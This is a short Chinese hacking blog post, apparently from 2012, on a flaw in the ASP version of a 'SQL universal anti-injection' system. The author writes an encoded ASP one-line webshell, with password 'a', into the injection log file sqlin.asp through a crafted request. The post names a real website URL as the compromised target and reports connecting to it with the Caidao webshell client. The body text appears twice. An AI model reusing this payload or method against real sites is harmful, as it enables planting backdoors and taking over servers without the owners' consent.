SQL通用防注入系統(tǒng)asp版漏洞
發(fā)布時間:2012-05-15 11:15:08 作者:佚名
我要評論

今晚群里朋友叫看個站,有sql防注入,繞不過,但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。
今晚群里朋友叫看個站,有sql防注入,繞不過,但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。

既然做了記錄,再查看了下它的記錄文件

于是想著構造個asp一句話寫進去,前面幾種沒加密的都失敗了,于是寫了個加密的
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀連接之,成功

+----------------------------------------+
其實過程并不難,也沒什么技術難度,但是有時遇到這種記錄注入錯誤的網站,多個便捷途徑還是不錯的。還有,另外百度了下,發(fā)現(xiàn)半坑土農民曾經發(fā)現(xiàn)了類似的,但是,額,去他博客看時 , 瀑布汗


既然做了記錄,再查看了下它的記錄文件

于是想著構造個asp一句話寫進去,前面幾種沒加密的都失敗了,于是寫了個加密的
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼 a (加密方式是: ANSI->Unicode)
提交 and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀連接之,成功

+----------------------------------------+
其實過程并不難,也沒什么技術難度,但是有時遇到這種記錄注入錯誤的網站,多個便捷途徑還是不錯的。還有,另外百度了下,發(fā)現(xiàn)半坑土農民曾經發(fā)現(xiàn)了類似的,但是,額,去他博客看時 , 瀑布汗


相關文章
- sqlmap 是一個自動SQL 射入工具。本文收集了一些利用Sqlmap做注入測試的TIPS,其中也包含一點繞WAF的技巧,便于大家集中查閱,歡迎接樓補充、分享。2014-07-29
- 近日,網站頻頻被黑。在網站里莫名其妙的多出一篇文 章,還有多出一組貼圖。正在納悶是誰可以登陸我的后臺發(fā)表文章和圖片的時候,我的qq彈出消息,一個陌生人給我發(fā)消息,2012-09-28
- Structured Query Language即結構化查詢語言,用于操作關系型數(shù)據(jù)庫管理系統(tǒng),本文給大家介紹SQL注入及危害、防御手段的處理方法,感興趣的朋友跟隨小編一起看看吧2022-10-10